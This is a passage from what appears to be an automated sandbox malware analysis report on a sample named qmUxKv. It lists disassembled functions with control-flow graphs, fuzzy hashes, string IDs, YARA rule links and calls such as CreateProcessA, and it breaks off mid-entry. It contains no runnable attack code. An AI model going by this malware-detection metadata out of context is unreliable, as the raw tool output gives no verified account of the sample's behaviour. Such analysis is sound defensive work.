                                                • Instruction Fuzzy Hash: ECB1B431E44219DFDB58CF98C654AADB7B2FF84720F25841AD402AF395CB309D56CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC0448 Relevance: 14.2, Strings: 11, Instructions: 453COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 6fc0448-6fc04fe call 6fc0b70 call 6fc0314 418 6fc0503-6fc0506 406->418 419 6fc050f-6fc0519 418->419 420 6fc0508 418->420 436 6fc06ac 419->436 437 6fc051f-6fc052d 419->437 420->419 421 6fc071c-6fc0729 420->421 422 6fc059d-6fc05a3 420->422 423 6fc053b-6fc056f 420->423 424 6fc07d4-6fc07e1 420->424 425 6fc0697-6fc06aa 420->425 426 6fc0630-6fc0692 420->426 427 6fc07f0 420->427 428 6fc0731-6fc073b 420->428 429 6fc074e 420->429 430 6fc07e9-6fc07ee 420->430 431 6fc05ea-6fc05f1 420->431 432 6fc0605-6fc060f 420->432 433 6fc0787-6fc078b 420->433 434 6fc0580-6fc058a 420->434 435 6fc06c2-6fc06c6 420->435 421->428 438 6fc05a9-6fc05b5 422->438 439 6fc05a5-6fc05a7 422->439 516 6fc0577-6fc057e 423->516 424->430 451 6fc06b1 425->451 426->418 470 6fc07fd-6fc0800 427->470 447 6fc073d-6fc0749 428->447 448 6fc0751-6fc0776 428->448 429->448 450 6fc077b-6fc077e 430->450 431->436 444 6fc05f7-6fc0600 431->444 445 6fc0618-6fc061f 432->445 446 6fc0611 432->446 442 6fc07ac 433->442 443 6fc078d-6fc0796 433->443 452 6fc058c 434->452 453 6fc0596-6fc059b 434->453 440 6fc06c8-6fc06d1 435->440 441 6fc06e7 435->441 436->451 437->436 449 6fc0533-6fc0539 437->449 455 6fc05b7-6fc05e5 438->455 439->455 456 6fc06d8-6fc06db 440->456 457 6fc06d3-6fc06d6 440->457 459 6fc06ea-6fc06ec 441->459 454 6fc07af-6fc07b1 442->454 460 6fc079d-6fc07a0 443->460 461 6fc0798-6fc079b 443->461 444->418 445->436 463 6fc0625-6fc062e 445->463 462 6fc0613 446->462 467 6fc06b6-6fc06b9 447->467 448->450 449->418 450->433 458 6fc0780 450->458 451->467 471 6fc0591 452->471 453->471 487 6fc07cd-6fc07d2 454->487 488 6fc07b3-6fc07bd 454->488 455->418 475 6fc06e5 456->475 457->475 458->424 458->427 458->430 458->433 476 6fc09a8-6fc09b6 458->476 477 6fc090a-6fc0983 458->477 478 6fc0a8a-6fc0aa1 458->478 479 6fc0854-6fc0858 458->479 480 6fc09f5-6fc0a6b 458->480 481 6fc0ad2-6fc0ad9 458->481 482 6fc0812-6fc0816 458->482 483 6fc0903-6fc0905 458->483 484 6fc06ee-6fc06f8 459->484 485 6fc0708-6fc070f 459->485 486 6fc07aa 460->486 461->486 462->418 463->462 467->435 472 6fc06bb 467->472 470->482 489 6fc0802 470->489 471->418 472->421 472->424 472->427 472->428 472->429 472->430 472->433 472->435 472->477 475->459 514 6fc09ce-6fc09d5 476->514 515 6fc09b8-6fc09be 476->515 553 6fc099b-6fc09a3 477->553 554 6fc0985-6fc098b 477->554 532 6fc0ab9-6fc0ac1 478->532 533 6fc0aa3-6fc0aa9 478->533 498 6fc085a-6fc0863 479->498 499 6fc087b 479->499 562 6fc0a71-6fc0a85 480->562 496 6fc0818-6fc0821 482->496 497 6fc0839 482->497 483->470 484->448 491 6fc06fa-6fc0701 484->491 485->448 492 6fc0711-6fc071a 485->492 486->454 487->424 500 6fc07cb 487->500 493 6fc07bf-6fc07c6 488->493 494 6fc07f3-6fc07f8 488->494 489->476 489->477 489->478 489->479 489->480 489->481 489->482 489->483 507 6fc0706 491->507 492->507 493->500 494->470 511 6fc0828-6fc0835 496->511 512 6fc0823-6fc0826 496->512 510 6fc083c-6fc0846 497->510 504 6fc086a-6fc0877 498->504 505 6fc0865-6fc0868 498->505 513 6fc087e-6fc08e8 499->513 500->450 518 6fc0879 504->518 505->518 507->467 530 6fc0851 510->530 517 6fc0837 511->517 512->517 555 6fc08ea-6fc08f0 513->555 556 6fc0900 513->556 564 6fc09da call 6fcc8a8 514->564 565 6fc09da call 6fcc898 514->565 566 6fc09da call 6fcb2b4 514->566 567 6fc09da call 6fcb2a4 514->567 568 6fc09da call 6fcb294 514->568 524 6fc09c0 515->524 525 6fc09c2-6fc09c4 515->525 516->418 517->510 518->513 524->514 525->514 530->479 531 6fc09e0 540 6fc09e8-6fc09f0 531->540 546 6fc0ac8-6fc0acd 532->546 535 6fc0aad-6fc0aaf 533->535 536 6fc0aab 533->536 535->532 536->532 540->470 546->470 553->470 557 6fc098d 554->557 558 6fc098f-6fc0991 554->558 559 6fc08f4-6fc08f6 555->559 560 6fc08f2 555->560 556->483 557->553 558->553 559->556 560->556 562->470 564->531 565->531 566->531 567->531 568->531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2818371802
                                                • Opcode ID: 0a5b10bd24758a6157dd58b8265a8522f10378e886c55f59a26c0c74ea7fcc7e
                                                • Instruction ID: 9b4185f09faec0736721ed11899d962a7e569a31e7f571e58208e013e0b2a51e
                                                • Opcode Fuzzy Hash: 0a5b10bd24758a6157dd58b8265a8522f10378e886c55f59a26c0c74ea7fcc7e
                                                • Instruction Fuzzy Hash: C6F17134F44209DFEB589F68D658BAE76E2BF84710F108429E502AB394DF76CC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC0438 Relevance: 9.1, Strings: 7, Instructions: 399COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 570 6fc0438-6fc04fe call 6fc0b70 call 6fc0314 583 6fc0503-6fc0506 570->583 584 6fc050f-6fc0519 583->584 585 6fc0508 583->585 601 6fc06ac 584->601 602 6fc051f-6fc052d 584->602 585->584 586 6fc071c-6fc0729 585->586 587 6fc059d-6fc05a3 585->587 588 6fc053b-6fc056f 585->588 589 6fc07d4-6fc07e1 585->589 590 6fc0697-6fc06aa 585->590 591 6fc0630-6fc0692 585->591 592 6fc07f0 585->592 593 6fc0731-6fc073b 585->593 594 6fc074e 585->594 595 6fc07e9-6fc07ee 585->595 596 6fc05ea-6fc05f1 585->596 597 6fc0605-6fc060f 585->597 598 6fc0787-6fc078b 585->598 599 6fc0580-6fc058a 585->599 600 6fc06c2-6fc06c6 585->600 586->593 603 6fc05a9-6fc05b5 587->603 604 6fc05a5-6fc05a7 587->604 681 6fc0577-6fc057e 588->681 589->595 616 6fc06b1 590->616 591->583 635 6fc07fd-6fc0800 592->635 612 6fc073d-6fc0749 593->612 613 6fc0751-6fc0776 593->613 594->613 615 6fc077b-6fc077e 595->615 596->601 609 6fc05f7-6fc0600 596->609 610 6fc0618-6fc061f 597->610 611 6fc0611 597->611 607 6fc07ac 598->607 608 6fc078d-6fc0796 598->608 617 6fc058c 599->617 618 6fc0596-6fc059b 599->618 605 6fc06c8-6fc06d1 600->605 606 6fc06e7 600->606 601->616 602->601 614 6fc0533-6fc0539 602->614 620 6fc05b7-6fc05e5 603->620 604->620 621 6fc06d8-6fc06db 605->621 622 6fc06d3-6fc06d6 605->622 624 6fc06ea-6fc06ec 606->624 619 6fc07af-6fc07b1 607->619 625 6fc079d-6fc07a0 608->625 626 6fc0798-6fc079b 608->626 609->583 610->601 628 6fc0625-6fc062e 610->628 627 6fc0613 611->627 632 6fc06b6-6fc06b9 612->632 613->615 614->583 615->598 623 6fc0780 615->623 616->632 636 6fc0591 617->636 618->636 652 6fc07cd-6fc07d2 619->652 653 6fc07b3-6fc07bd 619->653 620->583 640 6fc06e5 621->640 622->640 623->589 623->592 623->595 623->598 641 6fc09a8-6fc09b6 623->641 642 6fc090a-6fc0983 623->642 643 6fc0a8a-6fc0aa1 623->643 644 6fc0854-6fc0858 623->644 645 6fc09f5-6fc0a6b 623->645 646 6fc0ad2-6fc0ad9 623->646 647 6fc0812-6fc0816 623->647 648 6fc0903-6fc0905 623->648 649 6fc06ee-6fc06f8 624->649 650 6fc0708-6fc070f 624->650 651 6fc07aa 625->651 626->651 627->583 628->627 632->600 637 6fc06bb 632->637 635->647 654 6fc0802 635->654 636->583 637->586 637->589 637->592 637->593 637->594 637->595 637->598 637->600 637->642 640->624 679 6fc09ce-6fc09d5 641->679 680 6fc09b8-6fc09be 641->680 718 6fc099b-6fc09a3 642->718 719 6fc0985-6fc098b 642->719 697 6fc0ab9-6fc0ac1 643->697 698 6fc0aa3-6fc0aa9 643->698 663 6fc085a-6fc0863 644->663 664 6fc087b 644->664 727 6fc0a71-6fc0a85 645->727 661 6fc0818-6fc0821 647->661 662 6fc0839 647->662 648->635 649->613 656 6fc06fa-6fc0701 649->656 650->613 657 6fc0711-6fc071a 650->657 651->619 652->589 665 6fc07cb 652->665 658 6fc07bf-6fc07c6 653->658 659 6fc07f3-6fc07f8 653->659 654->641 654->642 654->643 654->644 654->645 654->646 654->647 654->648 672 6fc0706 656->672 657->672 658->665 659->635 676 6fc0828-6fc0835 661->676 677 6fc0823-6fc0826 661->677 675 6fc083c-6fc0846 662->675 669 6fc086a-6fc0877 663->669 670 6fc0865-6fc0868 663->670 678 6fc087e-6fc08e8 664->678 665->615 683 6fc0879 669->683 670->683 672->632 695 6fc0851 675->695 682 6fc0837 676->682 677->682 720 6fc08ea-6fc08f0 678->720 721 6fc0900 678->721 729 6fc09da call 6fcc8a8 679->729 730 6fc09da call 6fcc898 679->730 731 6fc09da call 6fcb2b4 679->731 732 6fc09da call 6fcb2a4 679->732 733 6fc09da call 6fcb294 679->733 689 6fc09c0 680->689 690 6fc09c2-6fc09c4 680->690 681->583 682->675 683->678 689->679 690->679 695->644 696 6fc09e0 705 6fc09e8-6fc09f0 696->705 711 6fc0ac8-6fc0acd 697->711 700 6fc0aad-6fc0aaf 698->700 701 6fc0aab 698->701 700->697 701->697 705->635 711->635 718->635 722 6fc098d 719->722 723 6fc098f-6fc0991 719->723 724 6fc08f4-6fc08f6 720->724 725 6fc08f2 720->725 721->648 722->718 723->718 724->721 725->721 727->635 729->696 730->696 731->696 732->696 733->696
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                                                • API String ID: 0-3830373724
                                                • Opcode ID: 9bd8e10f4f2cd570cc26c8b28ce04b5d8b637ec8f140f3cf16cb35d1c7f8ea1e
                                                • Instruction ID: eb0672c48c849a901dadce732bcf3e378f7931dfb248c97f914612b537e94f41
                                                • Opcode Fuzzy Hash: 9bd8e10f4f2cd570cc26c8b28ce04b5d8b637ec8f140f3cf16cb35d1c7f8ea1e
                                                • Instruction Fuzzy Hash: F0E17234F44209DFEB589F68DA54BAD76E2BB84721F108429E502AB394DF768C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC10A8 Relevance: 8.9, Strings: 7, Instructions: 114COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 735 6fc10a8-6fc10c3 736 6fc10ca-6fc10d0 735->736 737 6fc10d9-6fc1136 736->737 738 6fc10d2 736->738 745 6fc127c-6fc1286 737->745 772 6fc113c 737->772 738->737 739 6fc114e-6fc115f 738->739 740 6fc120e-6fc1215 738->740 741 6fc11d8-6fc11e9 738->741 742 6fc122b-6fc123c 738->742 743 6fc1192-6fc11a3 738->743 744 6fc1142-6fc1149 738->744 739->745 755 6fc1165-6fc117c 739->755 740->745 746 6fc1217-6fc1226 740->746 741->745 754 6fc11ef-6fc1206 741->754 742->745 752 6fc123e-6fc127b 742->752 743->745 753 6fc11a9-6fc11c0 743->753 744->736 746->736 753->745 764 6fc11c6-6fc11d3 753->764 754->745 765 6fc1208 754->765 755->745 763 6fc1182-6fc118d 755->763 763->736 764->736 765->740 772->744
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                • API String ID: 0-1901060420
                                                • Opcode ID: 44c563f601b9e9adeb30363ce625625394b4a9e5fee0df9d44d242eccc9fb736
                                                • Instruction ID: 566c8b999d310fd540a752259024156caa9d9778c5d72f9978c42945506569fc
                                                • Opcode Fuzzy Hash: 44c563f601b9e9adeb30363ce625625394b4a9e5fee0df9d44d242eccc9fb736
                                                • Instruction Fuzzy Hash: 7F41B674D0420ACFCB08DFA8C6A45AEBBB2FF45340F15C969D0125B366D731C959CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC0B70 Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 879 6fc0b70-6fc0ba0 881 6fc0ba5-6fc0ba8 879->881 882 6fc0baa 881->882 883 6fc0bb1-6fc0bb7 881->883 882->883 884 6fc0c5f-6fc0c66 882->884 885 6fc0bc8-6fc0bd6 882->885 886 6fc0c29-6fc0c30 882->886 887 6fc0c09-6fc0c1b 882->887 888 6fc0bfa-6fc0bff 882->888 889 6fc0c01 882->889 890 6fc0bbd-6fc0bc6 883->890 891 6fc0c69-6fc0c73 883->891 892 6fc0bdf-6fc0be6 885->892 893 6fc0bd8 885->893 895 6fc0c37-6fc0c39 886->895 896 6fc0c32-6fc0c36 886->896 887->891 894 6fc0c1d-6fc0c24 887->894 888->881 889->887 890->881 892->891 900 6fc0bec-6fc0bf8 892->900 899 6fc0bdd 893->899 894->881 897 6fc0c3b 895->897 898 6fc0c45-6fc0c4f 895->898 896->895 902 6fc0c40 897->902 898->891 903 6fc0c51-6fc0c5d 898->903 899->881 900->899 902->881 903->902
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq$8bq$8bq
                                                • API String ID: 0-2509483264
                                                • Opcode ID: 8dfce7964f20ccb965312b29c042d826c110b877f73d029d720364bfad95c5a5
                                                • Instruction ID: ba69ab93910829a084c0ae8d738255098d86891e8d4bd6979a94fb68d4d1cf66
                                                • Opcode Fuzzy Hash: 8dfce7964f20ccb965312b29c042d826c110b877f73d029d720364bfad95c5a5
                                                • Instruction Fuzzy Hash: C7212C31A08216CFE754CB69DA502BA7BA5FB41339F04423FE0B5C71D1CA3AC946C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC0758 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1011 6fc0758-6fc0776 1015 6fc077b-6fc077e 1011->1015 1016 6fc0787-6fc078b 1015->1016 1017 6fc0780 1015->1017 1029 6fc07ac 1016->1029 1030 6fc078d-6fc0796 1016->1030 1017->1016 1018 6fc09a8-6fc09b6 1017->1018 1019 6fc07e9-6fc07ee 1017->1019 1020 6fc090a-6fc0983 1017->1020 1021 6fc0a8a-6fc0aa1 1017->1021 1022 6fc07d4-6fc07e1 1017->1022 1023 6fc0854-6fc0858 1017->1023 1024 6fc09f5-6fc0a6b 1017->1024 1025 6fc07f0 1017->1025 1026 6fc0ad2-6fc0ad9 1017->1026 1027 6fc0812-6fc0816 1017->1027 1028 6fc0903-6fc0905 1017->1028 1056 6fc09ce-6fc09d5 1018->1056 1057 6fc09b8-6fc09be 1018->1057 1019->1015 1091 6fc099b-6fc09a3 1020->1091 1092 6fc0985-6fc098b 1020->1092 1070 6fc0ab9-6fc0ac1 1021->1070 1071 6fc0aa3-6fc0aa9 1021->1071 1022->1019 1032 6fc085a-6fc0863 1023->1032 1033 6fc087b 1023->1033 1100 6fc0a71-6fc0a85 1024->1100 1036 6fc07fd-6fc0800 1025->1036 1037 6fc0818-6fc0821 1027->1037 1038 6fc0839 1027->1038 1028->1036 1031 6fc07af-6fc07b1 1029->1031 1034 6fc079d-6fc07a0 1030->1034 1035 6fc0798-6fc079b 1030->1035 1044 6fc07cd-6fc07d2 1031->1044 1045 6fc07b3-6fc07bd 1031->1045 1040 6fc086a-6fc0877 1032->1040 1041 6fc0865-6fc0868 1032->1041 1053 6fc087e-6fc08e8 1033->1053 1043 6fc07aa 1034->1043 1035->1043 1036->1027 1050 6fc0802 1036->1050 1051 6fc0828-6fc0835 1037->1051 1052 6fc0823-6fc0826 1037->1052 1049 6fc083c-6fc0846 1038->1049 1054 6fc0879 1040->1054 1041->1054 1043->1031 1044->1022 1055 6fc07cb 1044->1055 1058 6fc07bf-6fc07c6 1045->1058 1059 6fc07f3-6fc07f8 1045->1059 1069 6fc0851 1049->1069 1050->1018 1050->1020 1050->1021 1050->1023 1050->1024 1050->1026 1050->1027 1050->1028 1060 6fc0837 1051->1060 1052->1060 1093 6fc08ea-6fc08f0 1053->1093 1094 6fc0900 1053->1094 1054->1053 1055->1015 1102 6fc09da call 6fcc8a8 1056->1102 1103 6fc09da call 6fcc898 1056->1103 1104 6fc09da call 6fcb2b4 1056->1104 1105 6fc09da call 6fcb2a4 1056->1105 1106 6fc09da call 6fcb294 1056->1106 1063 6fc09c0 1057->1063 1064 6fc09c2-6fc09c4 1057->1064 1058->1055 1059->1036 1060->1049 1063->1056 1064->1056 1069->1023 1084 6fc0ac8-6fc0acd 1070->1084 1074 6fc0aad-6fc0aaf 1071->1074 1075 6fc0aab 1071->1075 1072 6fc09e0 1080 6fc09e8-6fc09f0 1072->1080 1074->1070 1075->1070 1080->1036 1084->1036 1091->1036 1095 6fc098d 1092->1095 1096 6fc098f-6fc0991 1092->1096 1097 6fc08f4-6fc08f6 1093->1097 1098 6fc08f2 1093->1098 1094->1028 1095->1091 1096->1091 1097->1094 1098->1094 1100->1036 1102->1072 1103->1072 1104->1072 1105->1072 1106->1072
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: e7486afea2c404182db0507cbbc3977de4868574f02c401525a33ddf5eae88ba
                                                • Instruction ID: 5dbd34ba70da477a434f5b0d342a1d6f2211247efb3f43c5eecca9ed3e3388f2
                                                • Opcode Fuzzy Hash: e7486afea2c404182db0507cbbc3977de4868574f02c401525a33ddf5eae88ba
                                                • Instruction Fuzzy Hash: 18816434F44209DFEB589F68D658BAD77A3BF84721F108429E502AB394DF768C42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC0809 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1149 6fc0809-6fc0810 1150 6fc07f8 1149->1150 1151 6fc0812-6fc0816 1149->1151 1154 6fc07fd-6fc0800 1150->1154 1152 6fc0818-6fc0821 1151->1152 1153 6fc0839 1151->1153 1157 6fc0828-6fc0835 1152->1157 1158 6fc0823-6fc0826 1152->1158 1155 6fc083c-6fc0846 1153->1155 1154->1151 1156 6fc0802 1154->1156 1170 6fc0851 1155->1170 1156->1151 1159 6fc09a8-6fc09b6 1156->1159 1160 6fc090a-6fc0983 1156->1160 1161 6fc0a8a-6fc0aa1 1156->1161 1162 6fc0854-6fc0858 1156->1162 1163 6fc09f5-6fc0a6b 1156->1163 1164 6fc0ad2-6fc0ad9 1156->1164 1165 6fc0903-6fc0905 1156->1165 1166 6fc0837 1157->1166 1158->1166 1179 6fc09ce-6fc09d5 1159->1179 1180 6fc09b8-6fc09be 1159->1180 1208 6fc099b-6fc09a3 1160->1208 1209 6fc0985-6fc098b 1160->1209 1188 6fc0ab9-6fc0ac1 1161->1188 1189 6fc0aa3-6fc0aa9 1161->1189 1167 6fc085a-6fc0863 1162->1167 1168 6fc087b 1162->1168 1217 6fc0a71-6fc0a85 1163->1217 1165->1154 1166->1155 1172 6fc086a-6fc0877 1167->1172 1173 6fc0865-6fc0868 1167->1173 1176 6fc087e-6fc08e8 1168->1176 1170->1162 1178 6fc0879 1172->1178 1173->1178 1210 6fc08ea-6fc08f0 1176->1210 1211 6fc0900 1176->1211 1178->1176 1219 6fc09da call 6fcc8a8 1179->1219 1220 6fc09da call 6fcc898 1179->1220 1221 6fc09da call 6fcb2b4 1179->1221 1222 6fc09da call 6fcb2a4 1179->1222 1223 6fc09da call 6fcb294 1179->1223 1184 6fc09c0 1180->1184 1185 6fc09c2-6fc09c4 1180->1185 1184->1179 1185->1179 1201 6fc0ac8-6fc0acd 1188->1201 1192 6fc0aad-6fc0aaf 1189->1192 1193 6fc0aab 1189->1193 1190 6fc09e0 1197 6fc09e8-6fc09f0 1190->1197 1192->1188 1193->1188 1197->1154 1201->1154 1208->1154 1214 6fc098d 1209->1214 1215 6fc098f-6fc0991 1209->1215 1212 6fc08f4-6fc08f6 1210->1212 1213 6fc08f2 1210->1213 1211->1165 1212->1211 1213->1211 1214->1208 1215->1208 1217->1154 1219->1190 1220->1190 1221->1190 1222->1190 1223->1190
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: 6b5e14195857ca42485928431610884bc4b1a72af0dddc85f34e5a535775ac68
                                                • Instruction ID: a313b794b6c56deb8f857b6d198dddb9595d7e0c7b6a426ae39c90eeaecb87a5
                                                • Opcode Fuzzy Hash: 6b5e14195857ca42485928431610884bc4b1a72af0dddc85f34e5a535775ac68
                                                • Instruction Fuzzy Hash: 62616234F44209DFEB589F74DA58BAD76A3BB84721F108429E502AB3D4DE728D42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC6DC9 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1224 6fc6dc9-6fc6dd4 1225 6fc6e49-6fc6e4e 1224->1225 1226 6fc6dd6-6fc6df6 1224->1226 1229 6fc6e50-6fc6e5f 1225->1229 1230 6fc6e61-6fc6e68 1225->1230 1227 6fc6dfd-6fc6e02 1226->1227 1228 6fc6df8 1226->1228 1240 6fc6e05 call 6fc6ed0 1227->1240 1241 6fc6e05 call 6fc6ec1 1227->1241 1228->1227 1231 6fc6e6f-6fc6e7c 1229->1231 1230->1231 1232 6fc6e12-6fc6e2e 1231->1232 1234 6fc6e37-6fc6e38 1232->1234 1235 6fc6e30 1232->1235 1233 6fc6e0b 1233->1232 1238 6fc6ea5-6fc6ea9 1234->1238 1235->1233 1235->1234 1236 6fc6e7e-6fc6ea0 1235->1236 1237 6fc6e3a-6fc6e48 1235->1237 1235->1238 1236->1232 1237->1225 1240->1233 1241->1233
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 76e2c6a2afdffdaf4dc1b8c5d0b358026f3013832777faeda8624467f401edb2
                                                • Instruction ID: 2f4ddd2771c21d02186f9acb4ed83261d1fc36eb233367c014093269d42e364f
                                                • Opcode Fuzzy Hash: 76e2c6a2afdffdaf4dc1b8c5d0b358026f3013832777faeda8624467f401edb2
                                                • Instruction Fuzzy Hash: 32313CB4D1920ADFDB84CFA9C9405AEFBF2BF89210F14C5AAC544EB215E7309A45CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C27AED Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C27D2E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f5c8621f1d5d5b844d3d6e5c3bc03fa5605438f36f09c46f3bf7747ac01a1e4c
                                                • Instruction ID: 2825293d32eae440519c9af1aaf30dd182888606bc3d6de75549c66cef7a684e
                                                • Opcode Fuzzy Hash: f5c8621f1d5d5b844d3d6e5c3bc03fa5605438f36f09c46f3bf7747ac01a1e4c
                                                • Instruction Fuzzy Hash: 08A18171D01229DFDF10DF68C981BEDBBB2BF44314F1485AAD848A7250DBB4AA85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C27AF8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C27D2E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 5b96d43616cbfceeeffa32f8bac5e213a49bf76a5f3200fa2e17c6d9c7a05134
                                                • Instruction ID: cf9e5cc09ec3f5822c0bf5f98f5f70a8040adf91289600e02467d4d0112f1645
                                                • Opcode Fuzzy Hash: 5b96d43616cbfceeeffa32f8bac5e213a49bf76a5f3200fa2e17c6d9c7a05134
                                                • Instruction Fuzzy Hash: EB917271D01229DFDF10DF68C981BEDBBB2BF44314F1485AAD808A7250DBB4AA85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AAD00 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF56
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 8a6431a9156d0360c469b871b50bd73c81f1d1edbaf268d7a61b200916502138
                                                • Instruction ID: cd9297c6fbcf7e9add676717db661a8489ba08ae0defa008e1641db3f8fd5f58
                                                • Opcode Fuzzy Hash: 8a6431a9156d0360c469b871b50bd73c81f1d1edbaf268d7a61b200916502138
                                                • Instruction Fuzzy Hash: D47154B0A10B068FDB24DF2AC14079ABBF5FF88304F40892DD18ADBA50D775E845CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012A59A9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 2b83c5b9574aaef7063dafca7b34b2c283addc23daf867383e63ff6c1aafae84
                                                • Instruction ID: 6f920fbbc84f770368652354434c40a12696d927c2dd045e12553e0fb78ce485
                                                • Opcode Fuzzy Hash: 2b83c5b9574aaef7063dafca7b34b2c283addc23daf867383e63ff6c1aafae84
                                                • Instruction Fuzzy Hash: 2F41F2B0D10719CFDB24CFA9D884B8EBBB5BF48304F60806AD408AB251DB756985CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A58ED Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
